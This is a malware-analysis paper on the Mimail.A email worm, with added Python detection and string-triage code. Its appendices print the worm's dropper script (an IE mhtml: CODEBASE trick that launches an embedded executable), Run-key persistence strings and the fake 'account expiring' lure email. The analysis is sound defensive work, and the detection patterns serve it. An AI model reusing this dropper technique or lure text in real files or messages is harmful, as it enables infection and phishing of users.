ISW Security Papers Contest
 
A Closer Look at the Worm_Mimail.A by Charles Hornat on 13/09/03

Overview

On August 1, 2003, I encountered several emails from my email admin account informing me that my email address would be expiring and that I should read an attachment for further details. Being suspicious, I analyzed that file and the effects of it. This is a short overview of what I have found so far.


The Delivery

This particular infection arrives as an email and requires the user to open the message, unzip an HTML file, and launch it in Internet Explorer. Figure 1 is a snapshot of that email.

Figure 1: email message


The Tools 

Each description is taken from the vendor for your reference.

BinText
A small, very fast and powerful text extractor that will be of particular interest to programmers. It can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double byte ANSI) text and Resource strings, providing useful information for each item in the optional "advanced" view mode. Its comprehensive filtering helps prevent unwanted text being listed. The gathered list can be searched and saved to a separate file as either a plain text file or in informative tabular format.

Vendor: Foundstone

URL: http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&subcontent=/resources/proddesc/bintext.htm

TDIMON
TDImon is an application that lets you monitor TCP and UDP activity on your local system. It is the most powerful tool available for tracking down network-related configuration problems and analyzing application network usage.

Vendor: Sysinternals

URL: http://www.sysinternals.com/ntw2k/freeware/tdimon.shtml

Regmon
Regmon is a Registry monitoring utility that will show you which applications are accessing your Registry, which keys they are accessing, and the Registry data that they are reading and writing - all in real-time. This advanced utility takes you one step beyond what static Registry tools can do, to let you see and understand exactly how programs use the Registry. With static tools you might be able to see what Registry values and keys changed. With Regmon you'll see how the values and keys changed.

Vendor: Sysinternals

URL: http://www.sysinternals.com/ntw2k/source/regmon.shtml

Filemon
Filemon monitors and displays file system activity on a system in real-time. Its advanced capabilities make it a powerful tool for exploring the way Windows works, seeing how applications use the files and DLLs, or tracking down problems in system or application file configurations. Filemon's timestamping feature will show you precisely when every open, read, write or delete, happens, and its status column tells you the outcome. Filemon is so easy to use that you'll be an expert within minutes. It begins monitoring when you start it, and its output window can be saved to a file for off-line viewing. It has full search capability, and if you find that you're getting information overload, simply set up one or more filters.

Vendor: Sysinternals

URL: http://www.sysinternals.com/ntw2k/source/filemon.shtml

Regshot
Regshot allows you to take a snapshot of the registry, save it, perform whatever tasks you like, and take another snapshot. The value in this little application is that you can compare the shots taken, before and after, and analyze the differences.

Vendor: regshot.ist.md

URL: http://regshot.ist.md/

UPX
UPX is a free, portable, extendable, high-performance executable packer for several different executable formats. It achieves an excellent compression ratio and offers very fast decompression. Your executables suffer no memory overhead or other drawbacks.

Vendor: UPX

URL: http://upx.sourceforge.net/


Preparation

A default Windows XP system running inside a VMware environment was used as the test lab. Regmon, Filemon and TDImon were started and left running before infection. A registry snapshot was taken using Regshot. Once this was complete, a quick look was taken at the processes running on the system.


Infection

The email was opened, the zip file was unzipped, and the HTML file was double-clicked. Figure 2 is a screenshot of the HTML page. Note the bottom information bar indicating that something is happening.

Figure 2: Screenshot of Installation

During the installation, a process called 'Videodrv.exe' can be seen running (Figure 3).

Figure 3: Videodrv.exe

After about 5 minutes, an error message appeared on the screen. The error message can be seen in Figure 4.

Figure 4: Error Message

When this error message appeared, the HTML window's message about installing components disappeared, suggesting that the installation had completed.

There were no other visible indications that the system had been infected.


A Closer Look at the HTML

Running BinText on the file, or simply opening it in an editor, produced some readable lines of instructions, but most of the content was not readable and appeared to be encrypted. Some key lines that were visible included:

  • Content-Location:File://foo.exe
  • Content-Transfer-Encoding: binary
  • document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

Take note of the file foo.exe and the "moo ha ha" string. Are these important? Appendix A is a complete BinText listing of the HTML file in its original format.
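As an added example (my code, not part of Hornat's paper), the Python checker below looks for the delivery pattern these lines reveal: a MIME part whose Content-Location names an executable, and an OBJECT whose CODEBASE uses the mhtml: handler to point back into the same file with the !File://foo.exe sub-part reference. The two sample documents are constructed from the quoted lines, and the rule names and the benign CLSID are my own.

```python
import re

# Constructed sample, not the real message.html: the readable lines quoted
# above, assembled into a minimal stand-in (the binary foo.exe body is omitted).
SAMPLE_MESSAGE_HTML = r"""MIME-Version: 1.0
Content-Location:File://foo.exe
Content-Transfer-Encoding: binary

MZ(binary body omitted)
<body bgcolor=black scroll=no>
<SCRIPT>
function malware()
{s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(' <title>Message</title><body scroll=no bgcolor=white><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')}
setTimeout("malware()",150)
</script>
"""

# Constructed benign page with an ordinary OBJECT tag (made-up CLSID), for comparison.
BENIGN_HTML = """<html><head><title>Newsletter</title></head>
<body><p>Your statement is attached as a PDF.</p>
<object classid="CLSID:0A1B2C3D-4E5F-6071-8293-A4B5C6D7E8F9"></object>
</body></html>
"""

# Each rule is (name, compiled regex, explanation). Together they describe the
# delivery mechanism the paper documents: an HTML file that is really a MIME
# container holding an executable part, plus an OBJECT tag whose CODEBASE uses
# the mhtml: protocol to pull that part back out of the file.
RULES = [
    ("mime_part_is_exe",
     re.compile(r"^Content-Location:\s*file://[^\s\"']+\.exe\b", re.I | re.M),
     "MIME part whose Content-Location names an .exe"),
    ("binary_part",
     re.compile(r"^Content-Transfer-Encoding:\s*binary\b", re.I | re.M),
     "MIME part carried with binary transfer encoding"),
    ("mhtml_codebase",
     re.compile(r"codebase\s*=\s*[\"']?mhtml:", re.I),
     "OBJECT CODEBASE fetched through the mhtml: protocol handler"),
    ("codebase_targets_exe_part",
     re.compile(r"!file://[^\s\"']+\.exe\b", re.I),
     "mhtml: URL selects an executable sub-part with the ! separator"),
    ("placeholder_clsid",
     re.compile(r"CLSID:([0-9a-f])\1{7}(-\1{4}){3}-\1{12}", re.I),
     "CLASSID is a filler GUID rather than a registered class"),
    ("self_invoking_timer",
     re.compile(r"setTimeout\s*\(\s*[\"']\w+\(\)[\"']\s*,\s*\d+\s*\)", re.I),
     "script schedules its own function shortly after load"),
]


def scan_html(text):
    """Return the names of all rules that match, in RULES order."""
    return [name for name, rx, _ in RULES if rx.search(text)]


def mime_parts(text):
    """List the Content-Location values of the MIME parts in an MHTML file."""
    return re.findall(r"^Content-Location:\s*(\S+)", text, re.I | re.M)


def verdict(text):
    """'mhtml-dropper' needs both the executable MIME part and the mhtml:
    CODEBASE that extracts it; any other hit is only 'suspicious'."""
    hits = set(scan_html(text))
    if {"mime_part_is_exe", "mhtml_codebase"} <= hits:
        return "mhtml-dropper"
    if hits:
        return "suspicious"
    return "clean"


if __name__ == "__main__":
    for label, doc in (("message.html", SAMPLE_MESSAGE_HTML), ("benign", BENIGN_HTML)):
        print(f"{label}: {verdict(doc)}")
        for name in scan_html(doc):
            print("  -", name, ":", next(e for n, _, e in RULES if n == name))
```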


What is Videodrv.exe?

When the virus was launched, a process called videodrv.exe appeared. A closer look at the process reveals additional information; see Figure 4.

Figure 4: videodrv.exe (2)

Regshot was able to identify the following changes between the scan before infection, and the scan after:

C:\WINDOWS\exe.tmp

C:\WINDOWS\videodrv.exe

C:\WINDOWS\zip.tmp

This identifies three new files added to the target system that we can examine in more detail. The videodrv.exe file was the primary file, as seen in Process Explorer. Running BinText on the executable displayed a lot of unintelligible garbage, so the file was obviously packed or encrypted as well.

UPX, an executable packer, was the next tool used to try to unpack the executable and hopefully reveal the inner workings of the infection. UPX unpacked it successfully, so the file had been packed with UPX. BinText was then run against the unpacked file and gave a clear view of the application. For the full text, see Appendix B.

In the text, we could identify the following:

Software\Microsoft\Windows\CurrentVersion\Run\videodrv.exe 
\eml.tmp 
\exe.tmp 
\zip.tmp 
212.5.86.163 
The final point of this analysis is the identification of the email text that we saw in the original email that started the investigation:

0000589D 00474A9D 0 From: %s

000058A6 00474AA6 0 To: %s

000058AD 00474AAD 0 Reply-To: %s

000058C2 00474AC2 0 RCPT TO:<%s>

000058D1 00474AD1 0 MAIL FROM:<%s>

000058E2 00474AE2 0 HELO localhost

000058F7 00474AF7 0 admin@

000058FE 00474AFE 0 ----------%s

0000590B 00474B0B 0 %.8X%.8X

00005914 00474B14 0 X-Mailer: The Bat! (v1.61)

0000592F 00474B2F 0 X-Priority: 2 (High)

00005944 00474B44 0 Subject: your account %s

00005975 00474B75 0 MIME-Version: 1.0

00005987 00474B87 0 Content-Type: multipart/mixed; boundary="%s"

000059BA 00474BBA 0 Content-Type: text/plain; charset=us-ascii

000059E5 00474BE5 0 Content-Transfer-Encoding: 7bit

00005A07 00474C07 0 Hello there,

00005A15 00474C15 0 I would like to inform you about important information regarding your

00005A5B 00474C5B 0 email address. This email address will be expiring.

00005A8F 00474C8F 0 Please read attachment for details.

00005AB8 00474CB8 0 Best regards, Administrator

00005ADD 00474CDD 0 Content-Type: application/x-zip-compressed; name="message.zip"

00005B1C 00474D1C 0 Content-Transfer-Encoding: base64

00005B3E 00474D3E 0 Content-Disposition: attachment; filename="message.zip"

00005B7B 00474D7B 0 --%s--

Further analysis will be completed at a later date!
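As an added example (not from the paper), the Python below reproduces in code the steps just described: a BinText-style printable-string extraction, triage of the strings into the indicator groups found above (Run-key persistence, dropped .tmp files, the hard-coded IP, SMTP commands and mail headers), and a packed-versus-unpacked comparison showing why the packed binary yielded only garbage. The sample blob is constructed from strings quoted above, and zlib compression stands in for UPX packing since no real packed binary is embedded here.

```python
import re
import zlib

# Constructed stand-in for the unpacked videodrv.exe: a few of the strings
# quoted above, separated by non-printable filler bytes the way strings sit
# between code and data in a real PE. This is not the real binary.
_STRINGS = [
    b"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    b"\\videodrv.exe", b"\\eml.tmp", b"\\exe.tmp", b"\\zip.tmp",
    b"212.5.86.163", b"HELO localhost", b"MAIL FROM:<%s>", b"RCPT TO:<%s>",
    b"X-Mailer: The Bat! (v1.61)", b"Subject: your account %s",
    b'Content-Disposition: attachment; filename="message.zip"',
    b"wsock32.dll", b"RegSetValueExA", b"WinExec",
]
SAMPLE_UNPACKED = b"\x00\x90\x7f".join(_STRINGS) + b"\x00" * 16

# Stand-in for the UPX-packed form: zlib is not UPX, but like any packer it
# turns the readable strings into compressed bytes until the file is unpacked.
SAMPLE_PACKED = zlib.compress(SAMPLE_UNPACKED, 9)


def extract_strings(data, min_len=5):
    """BinText-style ASCII search: printable runs of at least min_len bytes."""
    runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)
    return [r.decode("ascii") for r in runs]


# Indicator groups the analysis above picked out of the string listing.
TRIAGE = {
    "persistence_run_key": re.compile(r"CurrentVersion\\Run\b", re.I),
    "dropped_temp_files": re.compile(r"\\\w+\.tmp$", re.I),
    "hardcoded_ipv4": re.compile(r"^(\d{1,3}\.){3}\d{1,3}$"),
    "smtp_commands": re.compile(r"^(HELO|EHLO|MAIL FROM|RCPT TO|DATA|QUIT)\b"),
    "mail_headers": re.compile(r"^(From|To|Subject|X-Mailer|Content-\w+):"),
    "network_imports": re.compile(r"^(wsock32\.dll|connect|gethostbyname|socket)$", re.I),
    "exec_or_registry_imports": re.compile(r"^(WinExec|RegSetValueExA|RegOpenKeyA)$"),
}


def triage(strings):
    """Group extracted strings by the indicator category they match."""
    found = {}
    for s in strings:
        for cat, rx in TRIAGE.items():
            if rx.search(s):
                found.setdefault(cat, []).append(s)
    return found


def readable_ratio(data, min_len=5):
    """Fraction of the bytes covered by printable strings; packed code scores low."""
    if not data:
        return 0.0
    return sum(len(s) for s in extract_strings(data, min_len)) / len(data)


def summarize(data):
    """Headline verdict in the paper's terms: does it mail, does it persist?"""
    groups = triage(extract_strings(data))
    return {
        "mailer": "smtp_commands" in groups and "mail_headers" in groups,
        "persists": "persistence_run_key" in groups,
        "categories": sorted(groups),
    }


if __name__ == "__main__":
    for label, blob in (("packed", SAMPLE_PACKED), ("unpacked", SAMPLE_UNPACKED)):
        print(f"{label}: readable {readable_ratio(blob):.0%}, {summarize(blob)}")
```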


Appendix A

File pos Mem pos ID Text

======== ======= == ====

00000000 00000000 0 MIME-Version: 1.0

00000012 00000012 0 Content-Location:File://foo.exe

00000032 00000032 0 Content-Transfer-Encoding: binary

000000A2 000000A2 0 !This program cannot be run in DOS mode.

00001F48 00001F48 0 ABCDEFG

00001F53 00001F53 0 HIJKLMNOPQRSTUVWXYZabcdefghijklm

00001F77 00001F77 0 nopqrstuvwxyz0123456789+/

00002D6D 00002D6D 0 KERNEL32.DLL

00002D7A 00002D7A 0 ADVAPI32.DLL

00002D87 00002D87 0 CRTDLL.DLL

00002D92 00002D92 0 GDI32.DLL

00002D9C 00002D9C 0 iphlpapi.DLL

00002DA9 00002DA9 0 ole32.DLL

00002DB3 00002DB3 0 OLEAUT32.DLL

00002DC0 00002DC0 0 USER32.DLL

00002DCB 00002DCB 0 wsock32.dll

00002DD9 00002DD9 0 LoadLibraryA

00002DE7 00002DE7 0 GetProcAddress

00002DF7 00002DF7 0 ExitProcess

00002E05 00002E05 0 RegCloseKey

00002E19 00002E19 0 GetStockObject

00002E29 00002E29 0 GetNetworkParams

00002E3B 00002E3B 0 CoInitialize

00002E49 00002E49 0 SysAllocString

00002E59 00002E59 0 SetTimer

00003075 00003075 0 <body bgcolor=black scroll=no>

00003094 00003094 0 <SCRIPT>

0000309D 0000309D 0 function malware()

000030B2 000030B2 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000030E8 000030E8 0 path=unescape(path);

000030FD 000030FD 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00003267 00003267 0 setTimeout("malware()",150)

[The <body>/<SCRIPT> block above is repeated a further 12 times in the file, each copy identical to the one listed; the repeats are omitted here.]

00004BA4 00004BA4 0 </script>


Appendix B

File pos Mem pos ID Text

======== ======= == ====

0000004D 0040004D 0 !This program cannot be run in DOS mode.

00000178 00400178 0 .text

000001C8 004001C8 0 .data

000001F0 004001F0 0 .idata

00004E5A 0047405A 0 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

00004E9B 0047409B 0 aweriouiopasafihokozavbnmcabcdefghijklmnopqrstuvwxyzoeioaearieao

0000532C 0047452C 0 abcdefghijklmnopqrstuvwxyz@.15

0000534C 0047454C 0 <body bgcolor=black scroll=no>

0000536B 0047456B 0 <SCRIPT>

00005374 00474574 0 function malware()

00005389 00474589 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000053BF 004745BF 0 path=unescape(path);

000053D4 004745D4 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000553E 0047473E 0 setTimeout("malware()",150)

0000555B 0047475B 0 </script>

00005565 00474765 0 MIME-Version: 1.0

00005577 00474777 0 Content-Location:File://foo.exe

00005597 00474797 0 Content-Transfer-Encoding: binary

000055BB 004747BB 0 VideoDriver

000055C7 004747C7 0 Software\Microsoft\Windows\CurrentVersion\Run

000055F5 004747F5 0 \videodrv.exe

00005605 00474805 0 C:\Program Files\

00005617 00474817 0 www.google.com

0000562A 0047482A 0 Error creating window

00005641 00474841 0 \eml.tmp

0000564A 0047484A 0 \exe.tmp

00005653 00474853 0 \zip.tmp

0000565C 0047485C 0 RegisterServiceProcess

00005673 00474873 0 kernel32.dll

00005680 00474880 0 Failed to connect: '%s'

00005699 00474899 0 From: %s

000056A2 004748A2 0 To: <%s>

000056AB 004748AB 0 Reply-To: <%s>

000056BA 004748BA 0 Subject: %s

000056C8 004748C8 0 %s %d

000056CE 004748CE 0 hostent() error: %d

000056E3 004748E3 0 Lookup failed

000056F2 004748F2 0 MX: '%s'

000056FC 004748FC 0 Domain: '%s'

0000570A 0047490A 0 c:\tmpe.tmp

00005724 00474924 0 LINE %d

0000572D 0047492D 0 Line %d: %s

0000578A 0047498A 0 Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

000057CB 004749CB 0 Failed to open '%s'

000057E0 004749E0 0 Memory allocation error, file %s, size %d

0000580B 00474A0B 0 Read error

00005873 00474A73 0 212.5.86.163

0000589D 00474A9D 0 From: %s

000058A6 00474AA6 0 To: %s

000058AD 00474AAD 0 Reply-To: %s

000058C2 00474AC2 0 RCPT TO:<%s>

000058D1 00474AD1 0 MAIL FROM:<%s>

000058E2 00474AE2 0 HELO localhost

000058F7 00474AF7 0 admin@

000058FE 00474AFE 0 ----------%s

0000590B 00474B0B 0 %.8X%.8X

00005914 00474B14 0 X-Mailer: The Bat! (v1.61)

0000592F 00474B2F 0 X-Priority: 2 (High)

00005944 00474B44 0 Subject: your account %s

00005975 00474B75 0 MIME-Version: 1.0

00005987 00474B87 0 Content-Type: multipart/mixed; boundary="%s"

000059BA 00474BBA 0 Content-Type: text/plain; charset=us-ascii

000059E5 00474BE5 0 Content-Transfer-Encoding: 7bit

00005A07 00474C07 0 Hello there,

00005A15 00474C15 0 I would like to inform you about important information regarding your

00005A5B 00474C5B 0 email address. This email address will be expiring.

00005A8F 00474C8F 0 Please read attachment for details.

00005AB8 00474CB8 0 Best regards, Administrator

00005ADD 00474CDD 0 Content-Type: application/x-zip-compressed; name="message.zip"

00005B1C 00474D1C 0 Content-Transfer-Encoding: base64

00005B3E 00474D3E 0 Content-Disposition: attachment; filename="message.zip"

00005B7B 00474D7B 0 --%s--

00005B89 00474D89 0 message.html

0000605A 0047545A 0 SysAllocString

0000606E 0047546E 0 CoCreateInstance

00006082 00475482 0 CLSIDFromString

00006096 00475496 0 CoInitialize

000060A6 004754A6 0 CoUninitialize

000060BA 004754BA 0 WSAGetLastError

000060CE 004754CE 0 WSAStartup

000060DE 004754DE 0 closesocket

000060EE 004754EE 0 connect

000060FA 004754FA 0 gethostbyname

0000610A 0047550A 0 htons

00006112 00475512 0 inet_addr

0000611E 0047551E 0 ioctlsocket

0000612E 0047552E 0 ntohs

0000613E 0047553E 0 select

00006152 00475552 0 socket

0000615E 0047555E 0 GetNetworkParams

00006172 00475572 0 FileTimeToDosDateTime

0000618A 0047558A 0 FindFirstFileA

0000619E 0047559E 0 FindNextFileA

000061AE 004755AE 0 FormatMessageA

000061C2 004755C2 0 GetCommandLineA

000061D6 004755D6 0 GetFileSize

000061E6 004755E6 0 GetModuleHandleA

000061FA 004755FA 0 CloseHandle

0000620A 0047560A 0 GetProcAddress

0000621E 0047561E 0 GetSystemTimeAsFileTime

0000623A 0047563A 0 GetTickCount

0000624A 0047564A 0 GetWindowsDirectoryA

00006262 00475662 0 CopyFileA

0000626E 0047566E 0 LoadLibraryA

0000627E 0047567E 0 CreateFileA

0000628E 0047568E 0 ReadFile

0000629A 0047569A 0 RtlUnwind

000062A6 004756A6 0 RtlZeroMemory

000062B6 004756B6 0 Sleep

000062BE 004756BE 0 TerminateThread

000062D2 004756D2 0 WinExec

000062DE 004756DE 0 CreateThread

000062EE 004756EE 0 DeleteFileA

000062FE 004756FE 0 GetWindowTextA

00006312 00475712 0 GetForegroundWindow

0000632A 0047572A 0 LoadCursorA

0000633A 0047573A 0 LoadIconA

00006346 00475746 0 SetTimer

00006352 00475752 0 KillTimer

0000635E 0047575E 0 RegisterClassA

00006372 00475772 0 MessageBoxA

00006382 00475782 0 GetMessageA

00006392 00475792 0 TranslateMessage

000063A6 004757A6 0 DispatchMessageA

000063BA 004757BA 0 PostQuitMessage

000063CE 004757CE 0 CreateWindowExA

000063E2 004757E2 0 DefWindowProcA

000063F6 004757F6 0 GetStockObject

0000640A 0047580A 0 RegEnumValueA

0000641A 0047581A 0 RegCloseKey

0000642A 0047582A 0 RegOpenKeyA

0000643A 0047583A 0 RegSetValueExA

0000644E 0047584E 0 _filelength

0000645E 0047585E 0 _fileno

0000646A 0047586A 0 __GetMainArgs

00006482 00475882 0 fclose

0000648E 0047588E 0 fgets

00006496 00475896 0 fopen

0000649E 0047589E 0 fprintf

000064AA 004758AA 0 fread

000064BA 004758BA 0 fwrite

000064C6 004758C6 0 malloc

000064D2 004758D2 0 memcpy

000064DE 004758DE 0 printf

000064EA 004758EA 0 raise

000064F2 004758F2 0 signal

000064FE 004758FE 0 sprintf

0000650A 0047590A 0 strcat

00006516 00475916 0 strchr

00006522 00475922 0 strcmp

0000652E 0047592E 0 strcpy

0000653A 0047593A 0 strlen

00006546 00475946 0 strncat

00006552 00475952 0 strncmp

0000655E 0047595E 0 strncpy

00006567 00475967 0 AOLEAUT32.DLL

0000657C 0047597C 0 ole32.DLL

00006598 00475998 0 wsock32.dll

000065D8 004759D8 0 iphlpapi.DLL

000065EC 004759EC 0 KERNEL32.DLL

00006658 00475A58 0 USER32.DLL

0000669C 00475A9C 0 GDI32.DLL

000066AC 00475AAC 0 ADVAPI32.DLL

000066CC 00475ACC 0 CRTDLL.DLL

00006820 00406820 0 <body bgcolor=black scroll=no>

0000683F 0040683F 0 <SCRIPT>

00006848 00406848 0 function malware()

0000685D 0040685D 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00006893 00406893 0 path=unescape(path);

000068A8 004068A8 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00006A12 00406A12 0 setTimeout("malware()",150)

00006A2F 00406A2F 0 </script><body bgcolor=black scroll=no>

00006A57 00406A57 0 <SCRIPT>

00006A60 00406A60 0 function malware()

00006A75 00406A75 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00006AAB 00406AAB 0 path=unescape(path);

00006AC0 00406AC0 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00006C2A 00406C2A 0 setTimeout("malware()",150)

00006C47 00406C47 0 </script><body bgcolor=black scroll=no>

00006C6F 00406C6F 0 <SCRIPT>

00006C78 00406C78 0 function malware()

00006C8D 00406C8D 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00006CC3 00406CC3 0 path=unescape(path);

00006CD8 00406CD8 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00006E42 00406E42 0 setTimeout("malware()",150)

00006E5F 00406E5F 0 </script><body bgcolor=black scroll=no>

00006E87 00406E87 0 <SCRIPT>

00006E90 00406E90 0 function malware()

00006EA5 00406EA5 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00006EDB 00406EDB 0 path=unescape(path);

00006EF0 00406EF0 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000705A 0040705A 0 setTimeout("malware()",150)

00007077 00407077 0 </script><body bgcolor=black scroll=no>

0000709F 0040709F 0 <SCRIPT>

000070A8 004070A8 0 function malware()

000070BD 004070BD 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000070F3 004070F3 0 path=unescape(path);

00007108 00407108 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00007272 00407272 0 setTimeout("malware()",150)

0000728F 0040728F 0 </script><body bgcolor=black scroll=no>

000072B7 004072B7 0 <SCRIPT>

000072C0 004072C0 0 function malware()

000072D5 004072D5 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

0000730B 0040730B 0 path=unescape(path);

00007320 00407320 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000748A 0040748A 0 setTimeout("malware()",150)

000074A7 004074A7 0 </script><body bgcolor=black scroll=no>

000074CF 004074CF 0 <SCRIPT>

000074D8 004074D8 0 function malware()

000074ED 004074ED 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00007523 00407523 0 path=unescape(path);

00007538 00407538 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

000076A2 004076A2 0 setTimeout("malware()",150)

000076BF 004076BF 0 </script><body bgcolor=black scroll=no>

000076E7 004076E7 0 <SCRIPT>

000076F0 004076F0 0 function malware()

00007705 00407705 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

0000773B 0040773B 0 path=unescape(path);

00007750 00407750 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

000078BA 004078BA 0 setTimeout("malware()",150)

000078D7 004078D7 0 </script><body bgcolor=black scroll=no>

000078FF 004078FF 0 <SCRIPT>

00007908 00407908 0 function malware()

0000791D 0040791D 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00007953 00407953 0 path=unescape(path);

00007968 00407968 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00007AD2 00407AD2 0 setTimeout("malware()",150)

00007AEF 00407AEF 0 </script><body bgcolor=black scroll=no>

00007B17 00407B17 0 <SCRIPT>

00007B20 00407B20 0 function malware()

00007B35 00407B35 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00007B6B 00407B6B 0 path=unescape(path);

00007B80 00407B80 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00007CEA 00407CEA 0 setTimeout("malware()",150)

00007D07 00407D07 0 </script><body bgcolor=black scroll=no>

00007D2F 00407D2F 0 <SCRIPT>

00007D38 00407D38 0 function malware()

00007D4D 00407D4D 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00007D83 00407D83 0 path=unescape(path);

00007D98 00407D98 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

00007F02 00407F02 0 setTimeout("malware()",150)

00007F1F 00407F1F 0 </script><body bgcolor=black scroll=no>

00007F47 00407F47 0 <SCRIPT>

00007F50 00407F50 0 function malware()

00007F65 00407F65 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

00007F9B 00407F9B 0 path=unescape(path);

00007FB0 00407FB0 0 document.write(' <title>Message</title><body scroll=no bgcolor=white><FONT face="Arial" color=black style="position:absolute;top:20;left:90;z-index:100; font-size:12px;">No message</center><OBJECT style="cursor:cross-hair" alt="moo ha ha" CLASSID="CLSID:11111111-1111-1111-1111-111111111111" CODEBASE="mhtml:'+path+'\\message.html!File://foo.exe"></OBJECT>')

0000811A 0040811A 0 setTimeout("malware()",150)

00008137 00408137 0 </script><body bgcolor=black scroll=no>

0000815F 0040815F 0 <SCRIPT>

00008168 00408168 0 function malware()

0000817D 0040817D 0 s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));

000081B3 004081B3 0 path=unescape(path);

